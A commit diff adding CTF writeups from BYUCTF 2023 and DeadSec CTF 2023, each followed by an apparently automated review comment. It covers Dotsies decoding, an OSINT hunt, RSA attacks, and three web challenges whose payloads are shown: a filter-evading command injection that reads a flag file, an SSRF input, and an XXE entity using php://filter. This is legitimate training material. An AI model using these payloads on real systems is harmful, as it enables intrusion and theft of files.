feat: added 2 CTF writeups
|
@ -0,0 +1,18 @@
|
|||
# Compact
|
||||
> Apparently this is meant to replace the Latin alphabet??
|
||||
|
||||
> Flag format: byuctf{word or phrase} case insensitve.
|
||||
|
||||
## About the Challenge
|
||||
We need to decode the message in the image below
|
||||
|
||||
![chall](chall.png)
|
||||
|
||||
## How to Solve?
|
||||
To solve this, im using [Dotsies translator](https://www.dcode.fr/dotsies-writing) by dcode.fr
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{well its definitely more compact}
|
||||
```
|
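Review bot: The challenge image link `![chall](chall.png)` under "About the Challenge" points at the README's own directory, while the flag screenshot uses `images/flag.png`; check where the file was actually committed and use one convention so the first image does not render broken. The solve step would also be easier to verify if it said in one sentence what Dotsies is and gave the decoded text before it is wrapped in the flag format, and "im" should be "I'm".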
|
@ -0,0 +1,30 @@
|
|||
# Legoclones 1
|
||||
> For some reason completely incomprehensible to mankind, you have become sworn enemies of one of the BYUCTF organizers, Legoclones. In your efforts to defeat him, you have decided to go back to the origins of Legoclones to learn more about him. This is what you know so far:
|
||||
|
||||
> He once claimed that he's been going by the moniker "Legoclones" for over a decade
|
||||
There was a website that he adopted and fostered for about 3 years, based on a specific, niche area of Star Wars
|
||||
Your goal now is to find this website that he claims as "his". When he retired from the website, he stated he was leaving it in the hands of Commander ????. What was the username of the person he turned the site over to?
|
||||
|
||||
> Notes from the organizer:
|
||||
|
||||
> The remaining 4 Legoclones-related OSINT challenges will open up after this one
|
||||
> Doxxing Legoclones in real-life will not help you in any of these OSINT challenges. Stick to Legoclones and not his real-life counterpart
|
||||
> Flag format - byuctf{Username}
|
||||
|
||||
## About the Challenge
|
||||
We have to find the username that took over the website when `Legoclones` retired
|
||||
|
||||
## How to Solve?
|
||||
At first im using [whatsmyname.app](https://whatsmyname.app/) to find any account related to `Legoclones`. And I found `Legoclones` have a reddit account. And if we check the account, I found there is 1 comment about his website
|
||||
|
||||
![reddit](images/reddit.png)
|
||||
|
||||
Go to the website and find his account and you will find the username that took over the fandom account
|
||||
|
||||
https://clonetrooper.fandom.com/wiki/User:Legoclones
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{Blyndblitz}
|
||||
```
|
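Review bot: The two description lines beginning "There was a website that he adopted" and "Your goal now is to find this website" have no leading `>`, so the organizer's text drops out of the blockquote and reads as the writeup's own words; prefix both with `>` like the surrounding lines. In "How to Solve?", the handover on the `User:Legoclones` page is only shown as a screenshot; quoting the sentence that names the successor would let a reader verify the flag without the image.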
|
@ -0,0 +1,21 @@
|
|||
# Legoclones 3
|
||||
> Wow, this wiki is so old, it wasn't even captured by the Wayback Machine until a few years after it had started to flourish. Can you figure out the exact date and time the wiki was created? There may be somewhat reputable sources with a date listed, but in an effort to force you to find an authoritative, reputable source, I'm also requiring you to find the time it was created too. Because I'm too lazy to worry about timezones, the flag is only the minute of when it was created.
|
||||
|
||||
> For example, if you found the wiki was created at 01:23, then the flag is byuctf{23}.
|
||||
|
||||
> Notes from the organizer:
|
||||
|
||||
> Doxxing Legoclones in real-life will not help you in any of these OSINT challenges. Stick to Legoclones and not his real-life counterpart
|
||||
> Flag format - byuctf{00}
|
||||
|
||||
## About the Challenge
|
||||
We have to find the time when the website was created
|
||||
|
||||
## How to Solve?
|
||||
You can find the time by checking history of the fandom (You can access the history [here](https://clonetrooper.fandom.com/wiki/Clone_Trooper_Wiki?action=history&dir=prev))
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{20}
|
||||
```
|
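Review bot: "How to Solve?" gives the history URL and the flag `byuctf{20}` but never states the timestamp read from the page history, so the answer rests entirely on `images/flag.png`; add the date and time as text. It would also help to say in one sentence what the `dir=prev` parameter in the link is for, since the reader is expected to land on the right revision.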
|
@ -0,0 +1,15 @@
|
|||
# BYUCTF 2023
|
||||
CTF writeup for The BYUCTF 2023. I took part in this CTF competition with the TCP1P team, and got 32th place out of 581 teams
|
||||
|
||||
Thanks to the team especially @dimasma0305 and @yuuna
|
||||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Crypto | [Compact](/BYUCTF%202023/Compact/)
|
||||
| Crypto | [RSA1](/BYUCTF%202023/RSA1/)
|
||||
| Crypto | [RSA2](/BYUCTF%202023/RSA2/)
|
||||
| Crypto | [RSA3](/BYUCTF%202023/RSA3/)
|
||||
| Crypto | [RSA4](/BYUCTF%202023/RSA4/)
|
||||
| Crypto | [RSA5](/BYUCTF%202023/RSA5/)
|
||||
| OSINT | [Legoclones 1](/BYUCTF%202023/Legoclones%201/)
|
||||
| OSINT | [Legoclones 2](/BYUCTF%202023/Legoclones%202/)
|
|
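Review bot: The index lists Legoclones 1 and Legoclones 2, but the writeups visible in this commit are Legoclones 1 and Legoclones 3, so the `Legoclones 2` link may have no target and Legoclones 3 is unreachable from the table; align the rows with the directories actually added. The data rows also lack the closing `|` that the header row has, and "32th" should be "32nd".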
@ -0,0 +1,22 @@
|
|||
# RSA1
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain modulus, public exponent, and the ciphertext
|
||||
|
||||
```
|
||||
n = 287838647563564518717519107521814079281
|
||||
|
||||
e = 7
|
||||
|
||||
c = 258476617615202392748150555415953446503
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and then choose the first option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{too_smol}
|
||||
```
|
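Review bot: "choose the first option" in "How to Solve?" names a menu position in X-RSA rather than the attack, so the writeup stops being reproducible if the tool's menu changes and does not say why it works. State the weakness instead: `n` here is only 39 decimal digits, small enough to factor directly, after which the private exponent follows from the factors and `e = 7`. The `-` under the title looks like a placeholder for the challenge description and should be filled in or dropped.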
|
@ -0,0 +1,5 @@
|
|||
n = 287838647563564518717519107521814079281
|
||||
|
||||
e = 7
|
||||
|
||||
c = 258476617615202392748150555415953446503
|
|
@ -0,0 +1,22 @@
|
|||
# RSA2
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain modulus, public exponent, and the ciphertext
|
||||
|
||||
```
|
||||
n = 546014635841741214724882952304387823741798461149589549073179989118942746109940806878269775538274570065946589413677004071487344751464649121103982272835006900203922112014630898761428602513684456008956735791010937229939856259403186940249737579526542460562078728957198932156520780835942292131829398548678970431263462917223085165930683353518778015361505451889259321493813123084031407195410778661720394898118828299025325200597986154170392835072784810370185329392356423340408483449291280713796374297147668615988522804223480631576577707073715128342533703842150980913675658012799681575774731843549389349977365287936534707998476564357339504431638612839358093914282814270477657856345062084136585402704930924062452984009716927826681976269057923158930326380110735873715506666086031427627450725825495228912040943784627278987497908133546573083543604901933763330940965980882566819970423354937076331119777415405707162588442490342746115310986462330781467571631209829523895479737199963129517613642920935109776495829400236613168913129178658637967592913193540283532220304664924612246117951571439486418122093867454452618997458068515332016877486822805232899716524040444751997121936138984564834862354469295078855441829018404782747219665338778379471257704041
|
||||
|
||||
e = 65537
|
||||
|
||||
c = 497483520135207500611760341868934810216889295862727367409205471739457798733223813938415492642898622071289502771394670201759355356873731071744923938304067196827981196823596976532284031567818944043351160692892539254848854527943095670705184836531463778923699513154523281624336593518751911469590777921172775020125081803529411082078530404614569485860638460689961289946436553586222781503048987585305336865777424252321433817251942278548031598867440246798562662298880488044382840476214732326114298681849826143159014132251265975612736174765852107701466877003101250308950535660691651846052082123375934624356694170453897672257371991315676787548733520567289929667876604682273501711766130944645562650989837328685043543330211830184365436596077862055649246517141787872170320358968622818470064395975654949073402489903952399985907827496667385839890041608685588908200009780210043116940593521695695047783434230143405184690206691002634954008353327872663055826018481013718627348218684688250775372760462829705754318024652361552668830110066219305953343851243676904796434142570868419087560131333056695456062994781034014322792678534785191950145702468201676105282230660132801024614625267740668507168119879074770666830923799616054485447308126877109671082189614
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and then choose the first option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{rsa_is_only_secure_when_p_and_q_are_unknown}
|
||||
```
|
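Review bot: The solve step is word for word the same as in RSA1 ("choose the first option"), yet this modulus is far longer than that one, so the text should say how the factors were obtained for this `n` (for example, whether it was already factored publicly or has a special form) and name the attack rather than the menu entry. As written, the flag's point about `p` and `q` being known is not backed by anything in the writeup.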
|
@ -0,0 +1,5 @@
|
|||
n = 546014635841741214724882952304387823741798461149589549073179989118942746109940806878269775538274570065946589413677004071487344751464649121103982272835006900203922112014630898761428602513684456008956735791010937229939856259403186940249737579526542460562078728957198932156520780835942292131829398548678970431263462917223085165930683353518778015361505451889259321493813123084031407195410778661720394898118828299025325200597986154170392835072784810370185329392356423340408483449291280713796374297147668615988522804223480631576577707073715128342533703842150980913675658012799681575774731843549389349977365287936534707998476564357339504431638612839358093914282814270477657856345062084136585402704930924062452984009716927826681976269057923158930326380110735873715506666086031427627450725825495228912040943784627278987497908133546573083543604901933763330940965980882566819970423354937076331119777415405707162588442490342746115310986462330781467571631209829523895479737199963129517613642920935109776495829400236613168913129178658637967592913193540283532220304664924612246117951571439486418122093867454452618997458068515332016877486822805232899716524040444751997121936138984564834862354469295078855441829018404782747219665338778379471257704041
|
||||
|
||||
e = 65537
|
||||
|
||||
c = 497483520135207500611760341868934810216889295862727367409205471739457798733223813938415492642898622071289502771394670201759355356873731071744923938304067196827981196823596976532284031567818944043351160692892539254848854527943095670705184836531463778923699513154523281624336593518751911469590777921172775020125081803529411082078530404614569485860638460689961289946436553586222781503048987585305336865777424252321433817251942278548031598867440246798562662298880488044382840476214732326114298681849826143159014132251265975612736174765852107701466877003101250308950535660691651846052082123375934624356694170453897672257371991315676787548733520567289929667876604682273501711766130944645562650989837328685043543330211830184365436596077862055649246517141787872170320358968622818470064395975654949073402489903952399985907827496667385839890041608685588908200009780210043116940593521695695047783434230143405184690206691002634954008353327872663055826018481013718627348218684688250775372760462829705754318024652361552668830110066219305953343851243676904796434142570868419087560131333056695456062994781034014322792678534785191950145702468201676105282230660132801024614625267740668507168119879074770666830923799616054485447308126877109671082189614
|
|
@ -0,0 +1,29 @@
|
|||
# RSA3
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain 2 modulus, public exponent, and 2 ciphertexts
|
||||
|
||||
```
|
||||
n1 = 26936730986023789726214222876998431579035871765812234385674097050592112272540329063679602773116293498245937781951160051718036177035087801218359133356523071700951108999020905116034905584806261203518345118128714311038590925635180342040347317022008233631809623824589107373210514331169745651687793393307158179191306187356408951648269495142386375021669218752561961647301029204701333026044435685936341126368602940601101599988477874713569476970068734357580527463645209944448988010693985476127837819331701523891965427561798033127731232916390511986369304971158889254173850566560028528340860519614489276904182246324437302697433
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 25934221721388531303090294836956821212346696995428676440185777623629033147440636130540319272854260855117016879903925227836710795492438220977864741830686432435183222727791461378988782191893620213711460265022633971293289987925875691438890670054518553696690583070284033592035281829227897938832962322172505881421894428362134145126751766514249801481330619906708370005958557827981820321861133293595400304305721764486699677941331024345924352161482159664366018182446127343098427579677894070842066840562853624060861183697917208697602208453017595582242281467105778066369782229287834403074433848470534633158573935584429007575715
|
||||
|
||||
|
||||
n2 = 20923351960149847207730448386993771286287991808293298691185156471519720793292179321382926775933281826329369963004005667653815105072159583791658532166606431385861980687037872135521884790087813454844716254644626942821490878728677736261700329782075809716063515721266692286574071240561529911159730824490258866613280873755548760004314650585913096197607936750263556276920577987540676841745347308103070523989154846358123142014592046611945781700690640990848003152423310523158983857208127158850925297742214928064334410930947749935069628731105093722212442331657106356911123912454871778728334875010902513275561639806401894881233
|
||||
|
||||
e2 = 65537
|
||||
|
||||
c2 = 5993773597007465934515223705550947500391213737662065644971977783446564890828050443747162704068048188331597029929182281837445674583301936037963788912954366180921337518251139032904603786774772009913305609053718347365864177247549192649908207240197602397010006677485658506955283638199651692990436006544549785434255965098715363287267470252318128158357490592521797199393154974403123099999366644663048724011101287811844340320520544010179529188112211115440469084617438296961494801221969674213288489675624156545941630517075958425681203711654677553772595530799489102830165490202523397154229276688719481530893488434863906070343
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and because then choose the 14th option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{coprime_means_factoring_N_becomes_much_easier}
|
||||
```
|
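Review bot: The sentence "and because then choose the 14th option" breaks off after "because", so the reason for picking that attack is missing. Complete it with the property of the inputs that was used, for instance what `gcd(n1, n2)` evaluates to for these two moduli, and name the attack instead of its position in the X-RSA menu. "2 modulus" should read "2 moduli".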
|
@ -0,0 +1,12 @@
|
|||
n1 = 26936730986023789726214222876998431579035871765812234385674097050592112272540329063679602773116293498245937781951160051718036177035087801218359133356523071700951108999020905116034905584806261203518345118128714311038590925635180342040347317022008233631809623824589107373210514331169745651687793393307158179191306187356408951648269495142386375021669218752561961647301029204701333026044435685936341126368602940601101599988477874713569476970068734357580527463645209944448988010693985476127837819331701523891965427561798033127731232916390511986369304971158889254173850566560028528340860519614489276904182246324437302697433
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 25934221721388531303090294836956821212346696995428676440185777623629033147440636130540319272854260855117016879903925227836710795492438220977864741830686432435183222727791461378988782191893620213711460265022633971293289987925875691438890670054518553696690583070284033592035281829227897938832962322172505881421894428362134145126751766514249801481330619906708370005958557827981820321861133293595400304305721764486699677941331024345924352161482159664366018182446127343098427579677894070842066840562853624060861183697917208697602208453017595582242281467105778066369782229287834403074433848470534633158573935584429007575715
|
||||
|
||||
|
||||
n2 = 20923351960149847207730448386993771286287991808293298691185156471519720793292179321382926775933281826329369963004005667653815105072159583791658532166606431385861980687037872135521884790087813454844716254644626942821490878728677736261700329782075809716063515721266692286574071240561529911159730824490258866613280873755548760004314650585913096197607936750263556276920577987540676841745347308103070523989154846358123142014592046611945781700690640990848003152423310523158983857208127158850925297742214928064334410930947749935069628731105093722212442331657106356911123912454871778728334875010902513275561639806401894881233
|
||||
|
||||
e2 = 65537
|
||||
|
||||
c2 = 5993773597007465934515223705550947500391213737662065644971977783446564890828050443747162704068048188331597029929182281837445674583301936037963788912954366180921337518251139032904603786774772009913305609053718347365864177247549192649908207240197602397010006677485658506955283638199651692990436006544549785434255965098715363287267470252318128158357490592521797199393154974403123099999366644663048724011101287811844340320520544010179529188112211115440469084617438296961494801221969674213288489675624156545941630517075958425681203711654677553772595530799489102830165490202523397154229276688719481530893488434863906070343
|
|
@ -0,0 +1,38 @@
|
|||
# RSA4
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain 3 modulus, public exponent, and 3 ciphertexts
|
||||
|
||||
```
|
||||
n1 = 25204912957894049536633029588071532883154221495361435745558539407530325536509218257991893451902442183954212400671502526830623527340613723328379300388737939211263541814108106183164630301938900862986688763583982133846507136234797325243547177627054271161715200611591594812723672399437505379398941496184886411879923583394041753902383846644013849190900416111230521180435101859101110596828380586449182686175177638441549656137307050392520754146511496313215137339773851458160180450925216541537448515297981124184019831730808991821344392915274230294654187421183676471212265322367890189804699510021526923237231850244056681024361
|
||||
|
||||
e1 = 3
|
||||
|
||||
c1 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n2 = 17730912385401458370516374144454354828481353051514329263921774569034415114147424203611660978860008058118764431105602401970281692066419254457694301039461623568501484102567802483628476717695013320444442267232019104240173401975387173805390636521671252624249730700497552226732834062715286458634274525026438931671208367178653031967364951679420066768732647183187381700016195545187024094717207787859217993871236368911145957298126589666514319408022801341248744002320245345234912423717815146532293315342644702101415345900126397475592837306256140915525455824350305349773210334856093169535686115299159772550674315375987529523179
|
||||
|
||||
e2 = 3
|
||||
|
||||
c2 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n3 = 23693871552180460990138635073805949225912252125308334418081834697641804631104724668330415198785050388969117484647897131795893896100932121531733121069301557203541651575306855376180158639595396645851251320756224273151350168394783274111111375428683335001923152182758469432988805562827169898721409159172411067426322303967736140645806651181720610635139163613355013365367013643617931710120446074129630384181873406149243284193113399417540744056880787819360491511062694356302764642727497777585348003477373456680752873785829149551421840290660162776229985812994060664107888011786183808824620497078292008444842754064007647832261
|
||||
|
||||
e3 = 3
|
||||
|
||||
c3 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and because then choose the 6th option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{hastad_broadcast_attack_is_why_e_needs_to_be_very_large}
|
||||
```
|
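Review bot: `c1`, `c2` and `c3` in the listing are the same number, and it is visibly shorter than any of the three moduli, which the writeup does not mention. With `e = 3` that strongly suggests the cube of the message was never reduced modulo any `n`, in which case the plaintext is just the integer cube root of `c`; say so, since it explains the result more directly than "choose the 6th option". The sentence also breaks off after "because", and "3 modulus" should be "3 moduli".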
|
@ -0,0 +1,21 @@
|
|||
n1 = 25204912957894049536633029588071532883154221495361435745558539407530325536509218257991893451902442183954212400671502526830623527340613723328379300388737939211263541814108106183164630301938900862986688763583982133846507136234797325243547177627054271161715200611591594812723672399437505379398941496184886411879923583394041753902383846644013849190900416111230521180435101859101110596828380586449182686175177638441549656137307050392520754146511496313215137339773851458160180450925216541537448515297981124184019831730808991821344392915274230294654187421183676471212265322367890189804699510021526923237231850244056681024361
|
||||
|
||||
e1 = 3
|
||||
|
||||
c1 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n2 = 17730912385401458370516374144454354828481353051514329263921774569034415114147424203611660978860008058118764431105602401970281692066419254457694301039461623568501484102567802483628476717695013320444442267232019104240173401975387173805390636521671252624249730700497552226732834062715286458634274525026438931671208367178653031967364951679420066768732647183187381700016195545187024094717207787859217993871236368911145957298126589666514319408022801341248744002320245345234912423717815146532293315342644702101415345900126397475592837306256140915525455824350305349773210334856093169535686115299159772550674315375987529523179
|
||||
|
||||
e2 = 3
|
||||
|
||||
c2 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n3 = 23693871552180460990138635073805949225912252125308334418081834697641804631104724668330415198785050388969117484647897131795893896100932121531733121069301557203541651575306855376180158639595396645851251320756224273151350168394783274111111375428683335001923152182758469432988805562827169898721409159172411067426322303967736140645806651181720610635139163613355013365367013643617931710120446074129630384181873406149243284193113399417540744056880787819360491511062694356302764642727497777585348003477373456680752873785829149551421840290660162776229985812994060664107888011786183808824620497078292008444842754064007647832261
|
||||
|
||||
e3 = 3
|
||||
|
||||
c3 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
|
@ -0,0 +1,26 @@
|
|||
# RSA5
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain 1 modulus, 2 public exponent, and 2 ciphertexts
|
||||
|
||||
```
|
||||
n = 158307578375429142391814474806884486236362186916188452580137711655290101749246194796158132723192108831610021920979976831387798531310286521988621973910776725756124498277292094830880179737057636826926718870947402385998304759357604096043571760391265436342427330673679572532727716853811470803394787706010603830747
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 147465654815005020063943150787541676244006907179548061733683379407115931956604160894199596187128857070739585522099795520030109295201146791378167977530770154086872347421667566213107792455663772279848013855378166127142983660396920011133029349489200452580907847840266595584254579298524777000061248118561875608240
|
||||
|
||||
e2 = 65521
|
||||
|
||||
c2 = 142713643080475406732653557020038566547302005567266455940547551173573770529850069157484999432568532977025654715928532390305041525635025949965799289602536953914794718670859158768092964083443092374251987427058692219234329521939404919423432910655508395090232621076454399975588453154238832799760275047924852124717
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and because then choose the 7th option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{NEVER_USE_SAME_MODULUS_WITH_DIFFERENT_e_VALUES}
|
||||
```
|
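Review bot: The sentence "and because then choose the 7th option" breaks off after "because"; the missing reason is the whole lesson of the challenge and should be written out. State that a single `n` is used with `e1 = 65537` and `e2 = 65521`, that the approach assumes both ciphertexts encrypt the same message and that the two exponents are coprime, and name the attack (common modulus) instead of citing the menu position. "2 public exponent" should be "2 public exponents".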
|
@ -0,0 +1,9 @@
|
|||
n = 158307578375429142391814474806884486236362186916188452580137711655290101749246194796158132723192108831610021920979976831387798531310286521988621973910776725756124498277292094830880179737057636826926718870947402385998304759357604096043571760391265436342427330673679572532727716853811470803394787706010603830747
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 147465654815005020063943150787541676244006907179548061733683379407115931956604160894199596187128857070739585522099795520030109295201146791378167977530770154086872347421667566213107792455663772279848013855378166127142983660396920011133029349489200452580907847840266595584254579298524777000061248118561875608240
|
||||
|
||||
e2 = 65521
|
||||
|
||||
c2 = 142713643080475406732653557020038566547302005567266455940547551173573770529850069157484999432568532977025654715928532390305041525635025949965799289602536953914794718670859158768092964083443092374251987427058692219234329521939404919423432910655508395090232621076454399975588453154238832799760275047924852124717
|
|
@ -0,0 +1,26 @@
|
|||
# Bing
|
||||
> `-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a website that contains a form and we can input a host there
|
||||
|
||||
![preview_1](images/preview_1.png)
|
||||
|
||||
And then I tried to input 127.0.0.1 and here was the output
|
||||
|
||||
![preview_2](images/preview_2.png)
|
||||
|
||||
## How to Solve?
|
||||
We need to exploit the website using `Command Injection` vulnerability in order to read the flag. Here is the payload that I used to read the flag
|
||||
|
||||
```
|
||||
127.0.0.1;c\a\t${IFS}/f\lag.txt${IFS}|base64
|
||||
```
|
||||
|
||||
Because some of the commands are blacklisted by the website (Like `cat` or `ls`), we can trick it with `/` character. And because whitespace is also blacklisted by the website we can use `${IFS}`
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
dead{okokok!!!_th1s_flAg_f0R_Y0U}
|
||||
```
|
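Review bot: The explanation says the blacklist is bypassed "with `/` character", but the payload `c\a\t${IFS}/f\lag.txt` uses backslashes inside the words; the forward slash there is only the path separator. Correct the character and add a sentence on why it works (the shell drops a backslash placed before an ordinary letter, so the filter sees `c\a\t` while the shell runs `cat`). The trailing `|base64` and the reason `flag` is written as `f\lag` are also left unexplained.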
|
@ -0,0 +1,29 @@
|
|||
# FRSS
|
||||
> `-`
|
||||
|
||||
## About the Challenge
|
||||
We got a websites that can make requests to other websites and display the response
|
||||
|
||||
![preview](images/preview.png)
|
||||
|
||||
We need to access `/hehe.txt` by using that feature. However there is a limit of characters that we can input into that form
|
||||
|
||||
![preview_2](images/preview_2.png)
|
||||
|
||||
## How to Solve?
|
||||
In order to read the flag, we need to access the website internally and access the `/hehe.txt` endpoint
|
||||
|
||||
At first, I inputted `127.0.0.1/hehe.txt` but the response is `Oh no no, url is too long I can't handle it`. And then I and found this [payload](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
|
||||
|
||||
![PayloadAllTheThings](images/PayloadAllTheThings.png)
|
||||
|
||||
So, my final payload was:
|
||||
```
|
||||
0.0.0.0/hehe.txt
|
||||
```
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
dead{Ashiiiibaaa_you_hAv3_Pybass_chA11}
|
||||
```
|
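Review bot: The writeup says there is a character limit but never gives it, so the reader cannot see why `0.0.0.0/hehe.txt` (16 characters) passes when `127.0.0.1/hehe.txt` (18 characters) is rejected; state the limit shown in `preview_2.png` as text. "And then I and found this" is missing a verb, and the link goes to the whole SSRF README rather than to the section the screenshot shows.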
|
@ -0,0 +1,10 @@
|
|||
# DeadSec CTF 2023
|
||||
CTF writeup for The DeadSec CTF 2023. I took part in this CTF competition with the TCP1P team, and got 16th place out of 436 teams
|
||||
|
||||
Thanks to the team especially @dimasma0305
|
||||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Web | [FRSS](/DeadSec%20CTF%202023/FRSS/)
|
||||
| Web | [Bing](/DeadSec%20CTF%202023/Bing/)
|
||||
| Web | [XEE1](/DeadSec%20CTF%202023/XEE1/)
|
|
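Review bot: The three data rows end without the closing `|` that the header row `| Category | Challenge |` has; add it so the table is consistent in every Markdown renderer.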
@ -0,0 +1,38 @@
|
|||
# XEE1
|
||||
> flag in flag.txt
|
||||
|
||||
## About the Challenge
|
||||
We have been given a website that contains a login page
|
||||
|
||||
![preview](images/preview.png)
|
||||
|
||||
And if we check the HTTP request and response when entering the username and password
|
||||
|
||||
![http](images/http.png)
|
||||
|
||||
|
||||
## How to Solve?
|
||||
At first, Im using a `file` protocol to read `/flag.txt` file
|
||||
|
||||
![first_request](images/first_request.png)
|
||||
|
||||
But the output was `You can't read the flag`. Im very confused because my payload was working perfectly if I want to read another file (ex: /etc/passwd)
|
||||
|
||||
![testing](images/testing.png)
|
||||
|
||||
So I decided to use PHP wrapper to encoded the output with `base64` encoding. Here is the final payload
|
||||
|
||||
```xml
|
||||
<!--?xml version="1.0" ?-->
|
||||
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt"> ]>
|
||||
<user>
|
||||
<username>&ent;</username>
|
||||
<password>test</password>
|
||||
</user>
|
||||
```
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
dead{n1ce_br0_XE3_3z_h3h3}
|
||||
```
|
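Review bot: The first line of the payload block, `<!--?xml version="1.0" ?-->`, is an XML comment rather than an XML declaration; if `<?xml version="1.0"?>` is what was sent, fix the line, otherwise drop it since a comment does nothing here. The text should also say why the `php://filter` base64 wrapper gets past the "You can't read the flag" response when the plain `file` read did not, for example whether the application checks the returned contents or the URI. "Im" and "to encoded" need correcting.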
|
@ -5,15 +5,15 @@ Thanks to the team especially @spitfire
|
|||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Jubilife | [The Historian Channel - 1](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [The Historian Channel - 2](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [The Historian Channel - 3](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Windows Pane - 1](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Windows Pane - 2](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Windows Pane - 3](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 1](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 2](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 1](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 2](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 3a](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 3b](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [The Historian Channel - 1](/ICSJWG%20CTF%202023/The%20Historian%20Channel%20-%201/)
|
||||
| Jubilife | [The Historian Channel - 2](/ICSJWG%20CTF%202023/The%20Historian%20Channel%20-%202/)
|
||||
| Jubilife | [The Historian Channel - 3](/ICSJWG%20CTF%202023/The%20Historian%20Channel%20-%203/)
|
||||
| Jubilife | [Windows Pane - 1](/ICSJWG%20CTF%202023/Windows%20Pane%20-%201/)
|
||||
| Jubilife | [Windows Pane - 2](/ICSJWG%20CTF%202023/Windows%20Pane%20-%202/)
|
||||
| Jubilife | [Windows Pane - 3](/ICSJWG%20CTF%202023/Windows%20Pane%20-%203/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 1](/ICSJWG%20CTF%202023/Chrome-Plated%20Nonsense%20-%201/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 2](/ICSJWG%20CTF%202023/Chrome-Plated%20Nonsense%20-%202/)
|
||||
